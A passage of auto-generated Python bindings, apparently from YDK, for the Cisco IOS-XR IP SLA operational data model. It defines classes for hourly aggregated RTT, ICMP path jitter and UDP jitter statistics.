self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.CommonStats, ['operation_time', 'return_code', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'update_count', 'ok_count', 'disconnect_count', 'timeout_count', 'busy_count', 'no_connection_count', 'dropped_count', 'internal_error_count', 'sequence_error_count', 'verify_error_count'], name, value)
class SpecificStats(Entity):
"""
Operation Specific Stats
.. attribute:: icmp_path_jitter_stats
icmp path jitter stats
**type**\: :py:class:`IcmpPathJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats>`
.. attribute:: udp_jitter_stats
udp jitter stats
**type**\: :py:class:`UdpJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats>`
.. attribute:: op_type
op type
**type**\: :py:class:`OpTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.OpTypeEnum>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats, self).__init__()
self.yang_name = "specific-stats"
self.yang_parent_name = "distribution-interval"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("icmp-path-jitter-stats", ("icmp_path_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats)), ("udp-jitter-stats", ("udp_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('op_type', YLeaf(YType.enumeration, 'op-type')),
])
self.op_type = None
self.icmp_path_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats()
self.icmp_path_jitter_stats.parent = self
self._children_name_map["icmp_path_jitter_stats"] = "icmp-path-jitter-stats"
self._children_yang_names.add("icmp-path-jitter-stats")
self.udp_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats()
self.udp_jitter_stats.parent = self
self._children_name_map["udp_jitter_stats"] = "udp-jitter-stats"
self._children_yang_names.add("udp-jitter-stats")
self._segment_path = lambda: "specific-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats, ['op_type'], name, value)
class IcmpPathJitterStats(Entity):
"""
icmp path jitter stats
.. attribute:: source_address
IP Address of the source
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: dest_address
IP Address of the destination
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: hop_address
IP address of the hop in the path
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: packet_interval
Interval between echos in ms
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time_count
Number of RTT samples used for the statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time
RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: min_response_time
Minimum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: max_response_time
Maximum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum_response_time
Sum of RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum2_response_time
Sum of RTT^2
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: packet_count
Number of Echo replies received
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_count
Number of packets lost
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sequence_count
Number of out of sequence packets
**type**\: int
**range:** 0..4294967295
.. attribute:: discarded_sample_count
Number of discarded samples
**type**\: int
**range:** 0..4294967295
.. attribute:: verify_errors_count
Number of packets with data corruption
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_error_count
Number of packets dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: jitter
Jitter value for this node in the path
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_sum
Sum of positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_sum2
Sum of squares of positive jitter values
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pos_jitter_min
Minimum positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_max
Maximum positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_count
Number of positive jitter values
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_sum
Sum of negative jitter values
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_min
Minimum negative jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_max
Maximum negative jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_sum2
Sum of squares of negative jitter values
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: neg_jitter_count
Number of negative jitter values
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats, self).__init__()
self.yang_name = "icmp-path-jitter-stats"
self.yang_parent_name = "specific-stats"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('source_address', YLeaf(YType.str, 'source-address')),
('dest_address', YLeaf(YType.str, 'dest-address')),
('hop_address', YLeaf(YType.str, 'hop-address')),
('packet_interval', YLeaf(YType.uint32, 'packet-interval')),
('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
('packet_count', YLeaf(YType.uint32, 'packet-count')),
('packet_loss_count', YLeaf(YType.uint32, 'packet-loss-count')),
('out_of_sequence_count', YLeaf(YType.uint32, 'out-of-sequence-count')),
('discarded_sample_count', YLeaf(YType.uint32, 'discarded-sample-count')),
('verify_errors_count', YLeaf(YType.uint32, 'verify-errors-count')),
('dropped_error_count', YLeaf(YType.uint32, 'dropped-error-count')),
('jitter', YLeaf(YType.uint32, 'jitter')),
('pos_jitter_sum', YLeaf(YType.uint32, 'pos-jitter-sum')),
('pos_jitter_sum2', YLeaf(YType.uint64, 'pos-jitter-sum2')),
('pos_jitter_min', YLeaf(YType.uint32, 'pos-jitter-min')),
('pos_jitter_max', YLeaf(YType.uint32, 'pos-jitter-max')),
('pos_jitter_count', YLeaf(YType.uint32, 'pos-jitter-count')),
('neg_jitter_sum', YLeaf(YType.uint32, 'neg-jitter-sum')),
('neg_jitter_min', YLeaf(YType.uint32, 'neg-jitter-min')),
('neg_jitter_max', YLeaf(YType.uint32, 'neg-jitter-max')),
('neg_jitter_sum2', YLeaf(YType.uint64, 'neg-jitter-sum2')),
('neg_jitter_count', YLeaf(YType.uint32, 'neg-jitter-count')),
])
self.source_address = None
self.dest_address = None
self.hop_address = None
self.packet_interval = None
self.response_time_count = None
self.response_time = None
self.min_response_time = None
self.max_response_time = None
self.sum_response_time = None
self.sum2_response_time = None
self.packet_count = None
self.packet_loss_count = None
self.out_of_sequence_count = None
self.discarded_sample_count = None
self.verify_errors_count = None
self.dropped_error_count = None
self.jitter = None
self.pos_jitter_sum = None
self.pos_jitter_sum2 = None
self.pos_jitter_min = None
self.pos_jitter_max = None
self.pos_jitter_count = None
self.neg_jitter_sum = None
self.neg_jitter_min = None
self.neg_jitter_max = None
self.neg_jitter_sum2 = None
self.neg_jitter_count = None
self._segment_path = lambda: "icmp-path-jitter-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats, ['source_address', 'dest_address', 'hop_address', 'packet_interval', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'packet_count', 'packet_loss_count', 'out_of_sequence_count', 'discarded_sample_count', 'verify_errors_count', 'dropped_error_count', 'jitter', 'pos_jitter_sum', 'pos_jitter_sum2', 'pos_jitter_min', 'pos_jitter_max', 'pos_jitter_count', 'neg_jitter_sum', 'neg_jitter_min', 'neg_jitter_max', 'neg_jitter_sum2', 'neg_jitter_count'], name, value)
class UdpJitterStats(Entity):
"""
udp jitter stats
.. attribute:: jitter_in
Input Jitter moving average, computed as per RFC1889
**type**\: int
**range:** 0..4294967295
.. attribute:: jitter_out
Output Jitter moving average, computed as per RFC1889
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_sd
Packets lost in source to destination (SD) direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_ds
Packets lost in destination to source (DS) direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_out_of_sequence
Packets out of sequence
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_mia
Packets missing in action (cannot determine if theywere lost in SD or DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_skipped
Packets which are skipped
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_late_arrivals
Packets arriving late
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_invalid_tstamp
Packets with bad timestamps
**type**\: int
**range:** 0..4294967295
.. attribute:: internal_errors_count
Number of internal errors
**type**\: int
**range:** 0..4294967295
.. attribute:: busies_count
Number of busies
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_sum
Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in SD direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: positive_sd_sum2
Sum of squares of positive jitter values in SD direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: positive_sd_min
Minimum of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_max
Maximum of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_count
Number of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_sum
Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in SD direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: negative_sd_sum2
Sum of squares of negative jitter values in SD direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: negative_sd_min
Minimum of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_max
Maximum of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_count
Number of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_sum
Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in DS direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: positive_ds_sum2
Sum of squares of positive jitter values in DS direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: positive_ds_min
Minimum of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_max
Maximum of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_count
Number of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_sum
Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in DS direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: negative_ds_sum2
Sum of squares of negative jitter values in DS direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: negative_ds_min
Minimum of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_max
Maximum of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_count
Number of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_count
Number of probe/probe\-response pairs used to compute one\-way statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_min
Minimum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_max
Maximum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_sum
Sum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_sum2
Sum of squares of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: one_way_ds_min
Minimum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_max
Maximum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_sum
Sum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_sum2
Sum of squares of the OneWayMinDS and OneWayMaxDS values (msec)
**type**\: int
**range:** 0..18446744073709551615
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats, self).__init__()
self.yang_name = "udp-jitter-stats"
self.yang_parent_name = "specific-stats"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('jitter_in', YLeaf(YType.uint32, 'jitter-in')),
('jitter_out', YLeaf(YType.uint32, 'jitter-out')),
('packet_loss_sd', YLeaf(YType.uint32, 'packet-loss-sd')),
('packet_loss_ds', YLeaf(YType.uint32, 'packet-loss-ds')),
('packet_out_of_sequence', YLeaf(YType.uint32, 'packet-out-of-sequence')),
('packet_mia', YLeaf(YType.uint32, 'packet-mia')),
('packet_skipped', YLeaf(YType.uint32, 'packet-skipped')),
('packet_late_arrivals', YLeaf(YType.uint32, 'packet-late-arrivals')),
('packet_invalid_tstamp', YLeaf(YType.uint32, 'packet-invalid-tstamp')),
('internal_errors_count', YLeaf(YType.uint32, 'internal-errors-count')),
('busies_count', YLeaf(YType.uint32, 'busies-count')),
('positive_sd_sum', YLeaf(YType.uint32, 'positive-sd-sum')),
('positive_sd_sum2', YLeaf(YType.uint64, 'positive-sd-sum2')),
('positive_sd_min', YLeaf(YType.uint32, 'positive-sd-min')),
('positive_sd_max', YLeaf(YType.uint32, 'positive-sd-max')),
('positive_sd_count', YLeaf(YType.uint32, 'positive-sd-count')),
('negative_sd_sum', YLeaf(YType.uint32, 'negative-sd-sum')),
('negative_sd_sum2', YLeaf(YType.uint64, 'negative-sd-sum2')),
('negative_sd_min', YLeaf(YType.uint32, 'negative-sd-min')),
('negative_sd_max', YLeaf(YType.uint32, 'negative-sd-max')),
('negative_sd_count', YLeaf(YType.uint32, 'negative-sd-count')),
('positive_ds_sum', YLeaf(YType.uint32, 'positive-ds-sum')),
('positive_ds_sum2', YLeaf(YType.uint64, 'positive-ds-sum2')),
('positive_ds_min', YLeaf(YType.uint32, 'positive-ds-min')),
('positive_ds_max', YLeaf(YType.uint32, 'positive-ds-max')),
('positive_ds_count', YLeaf(YType.uint32, 'positive-ds-count')),
('negative_ds_sum', YLeaf(YType.uint32, 'negative-ds-sum')),
('negative_ds_sum2', YLeaf(YType.uint64, 'negative-ds-sum2')),
('negative_ds_min', YLeaf(YType.uint32, 'negative-ds-min')),
('negative_ds_max', YLeaf(YType.uint32, 'negative-ds-max')),
('negative_ds_count', YLeaf(YType.uint32, 'negative-ds-count')),
('one_way_count', YLeaf(YType.uint32, 'one-way-count')),
('one_way_sd_min', YLeaf(YType.uint32, 'one-way-sd-min')),
('one_way_sd_max', YLeaf(YType.uint32, 'one-way-sd-max')),
('one_way_sd_sum', YLeaf(YType.uint32, 'one-way-sd-sum')),
('one_way_sd_sum2', YLeaf(YType.uint64, 'one-way-sd-sum2')),
('one_way_ds_min', YLeaf(YType.uint32, 'one-way-ds-min')),
('one_way_ds_max', YLeaf(YType.uint32, 'one-way-ds-max')),
('one_way_ds_sum', YLeaf(YType.uint32, 'one-way-ds-sum')),
('one_way_ds_sum2', YLeaf(YType.uint64, 'one-way-ds-sum2')),
])
self.jitter_in = None
self.jitter_out = None
self.packet_loss_sd = None
self.packet_loss_ds = None
self.packet_out_of_sequence = None
self.packet_mia = None
self.packet_skipped = None
self.packet_late_arrivals = None
self.packet_invalid_tstamp = None
self.internal_errors_count = None
self.busies_count = None
self.positive_sd_sum = None
self.positive_sd_sum2 = None
self.positive_sd_min = None
self.positive_sd_max = None
self.positive_sd_count = None
self.negative_sd_sum = None
self.negative_sd_sum2 = None
self.negative_sd_min = None
self.negative_sd_max = None
self.negative_sd_count = None
self.positive_ds_sum = None
self.positive_ds_sum2 = None
self.positive_ds_min = None
self.positive_ds_max = None
self.positive_ds_count = None
self.negative_ds_sum = None
self.negative_ds_sum2 = None
self.negative_ds_min = None
self.negative_ds_max = None
self.negative_ds_count = None
self.one_way_count = None
self.one_way_sd_min = None
self.one_way_sd_max = None
self.one_way_sd_sum = None
self.one_way_sd_sum2 = None
self.one_way_ds_min = None
self.one_way_ds_max = None
self.one_way_ds_sum = None
self.one_way_ds_sum2 = None
self._segment_path = lambda: "udp-jitter-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats, ['jitter_in', 'jitter_out', 'packet_loss_sd', 'packet_loss_ds', 'packet_out_of_sequence', 'packet_mia', 'packet_skipped', 'packet_late_arrivals', 'packet_invalid_tstamp', 'internal_errors_count', 'busies_count', 'positive_sd_sum', 'positive_sd_sum2', 'positive_sd_min', 'positive_sd_max', 'positive_sd_count', 'negative_sd_sum', 'negative_sd_sum2', 'negative_sd_min', 'negative_sd_max', 'negative_sd_count', 'positive_ds_sum', 'positive_ds_sum2', 'positive_ds_min', 'positive_ds_max', 'positive_ds_count', 'negative_ds_sum', 'negative_ds_sum2', 'negative_ds_min', 'negative_ds_max', 'negative_ds_count', 'one_way_count', 'one_way_sd_min', 'one_way_sd_max', 'one_way_sd_sum', 'one_way_sd_sum2', 'one_way_ds_min', 'one_way_ds_max', 'one_way_ds_sum', 'one_way_ds_sum2'], name, value)
class NonDistributed(Entity):
"""
Statistics aggregated for the total range
of values in 1\-hour intervals
.. attribute:: target
Total 1\-hour aggregated statistics for the target node
**type**\: :py:class:`Target <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target>`
.. attribute:: paths
Table of paths identified in the 1\-hour interval
**type**\: :py:class:`Paths <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths>`
.. attribute:: lpd_paths
List of latest LPD paths
**type**\: :py:class:`LpdPaths <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed, self).__init__()
self.yang_name = "non-distributed"
self.yang_parent_name = "hour"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("target", ("target", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target)), ("paths", ("paths", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths)), ("lpd-paths", ("lpd_paths", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.target = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target()
self.target.parent = self
self._children_name_map["target"] = "target"
self._children_yang_names.add("target")
self.paths = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths()
self.paths.parent = self
self._children_name_map["paths"] = "paths"
self._children_yang_names.add("paths")
self.lpd_paths = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths()
self.lpd_paths.parent = self
self._children_name_map["lpd_paths"] = "lpd-paths"
self._children_yang_names.add("lpd-paths")
self._segment_path = lambda: "non-distributed"
class Target(Entity):
"""
Total 1\-hour aggregated statistics for
the target node
.. attribute:: common_stats
Common Stats
**type**\: :py:class:`CommonStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.CommonStats>`
.. attribute:: specific_stats
Operation Specific Stats
**type**\: :py:class:`SpecificStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target, self).__init__()
self.yang_name = "target"
self.yang_parent_name = "non-distributed"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("common-stats", ("common_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.CommonStats)), ("specific-stats", ("specific_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.common_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.CommonStats()
self.common_stats.parent = self
self._children_name_map["common_stats"] = "common-stats"
self._children_yang_names.add("common-stats")
self.specific_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats()
self.specific_stats.parent = self
self._children_name_map["specific_stats"] = "specific-stats"
self._children_yang_names.add("specific-stats")
self._segment_path = lambda: "target"
class CommonStats(Entity):
"""
Common Stats
.. attribute:: operation_time
Operation Time
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: return_code
Return code
**type**\: :py:class:`IpslaRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`
.. attribute:: response_time_count
Number of RTT samples used for the statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time
RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: min_response_time
Minimum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: max_response_time
Maximum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum_response_time
Sum of RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum2_response_time
Sum of RTT^2
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: update_count
Number of updates processed
**type**\: int
**range:** 0..4294967295
.. attribute:: ok_count
Number of updates with Okay return code
**type**\: int
**range:** 0..4294967295
.. attribute:: disconnect_count
Number of updates with Disconnected return code
**type**\: int
**range:** 0..4294967295
.. attribute:: timeout_count
Number of updates with Timeout return code
**type**\: int
**range:** 0..4294967295
.. attribute:: busy_count
Number of updates with Busy return code
**type**\: int
**range:** 0..4294967295
.. attribute:: no_connection_count
Number of updates with NotConnected return code
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_count
Number of updates with Dropped return code
**type**\: int
**range:** 0..4294967295
.. attribute:: internal_error_count
Number of updates with InternalError return code
**type**\: int
**range:** 0..4294967295
.. attribute:: sequence_error_count
Number of updates with SeqError return code
**type**\: int
**range:** 0..4294967295
.. attribute:: verify_error_count
Number of updates with VerifyError return code
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.CommonStats, self).__init__()
self.yang_name = "common-stats"
self.yang_parent_name = "target"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('operation_time', YLeaf(YType.uint64, 'operation-time')),
('return_code', YLeaf(YType.enumeration, 'return-code')),
('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
('update_count', YLeaf(YType.uint32, 'update-count')),
('ok_count', YLeaf(YType.uint32, 'ok-count')),
('disconnect_count', YLeaf(YType.uint32, 'disconnect-count')),
('timeout_count', YLeaf(YType.uint32, 'timeout-count')),
('busy_count', YLeaf(YType.uint32, 'busy-count')),
('no_connection_count', YLeaf(YType.uint32, 'no-connection-count')),
('dropped_count', YLeaf(YType.uint32, 'dropped-count')),
('internal_error_count', YLeaf(YType.uint32, 'internal-error-count')),
('sequence_error_count', YLeaf(YType.uint32, 'sequence-error-count')),
('verify_error_count', YLeaf(YType.uint32, 'verify-error-count')),
])
self.operation_time = None
self.return_code = None
self.response_time_count = None
self.response_time = None
self.min_response_time = None
self.max_response_time = None
self.sum_response_time = None
self.sum2_response_time = None
self.update_count = None
self.ok_count = None
self.disconnect_count = None
self.timeout_count = None
self.busy_count = None
self.no_connection_count = None
self.dropped_count = None
self.internal_error_count = None
self.sequence_error_count = None
self.verify_error_count = None
self._segment_path = lambda: "common-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.CommonStats, ['operation_time', 'return_code', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'update_count', 'ok_count', 'disconnect_count', 'timeout_count', 'busy_count', 'no_connection_count', 'dropped_count', 'internal_error_count', 'sequence_error_count', 'verify_error_count'], name, value)
class SpecificStats(Entity):
"""
Operation Specific Stats
.. attribute:: icmp_path_jitter_stats
icmp path jitter stats
**type**\: :py:class:`IcmpPathJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.IcmpPathJitterStats>`
.. attribute:: udp_jitter_stats
udp jitter stats
**type**\: :py:class:`UdpJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.UdpJitterStats>`
.. attribute:: op_type
op type
**type**\: :py:class:`OpTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.OpTypeEnum>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats, self).__init__()
self.yang_name = "specific-stats"
self.yang_parent_name = "target"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
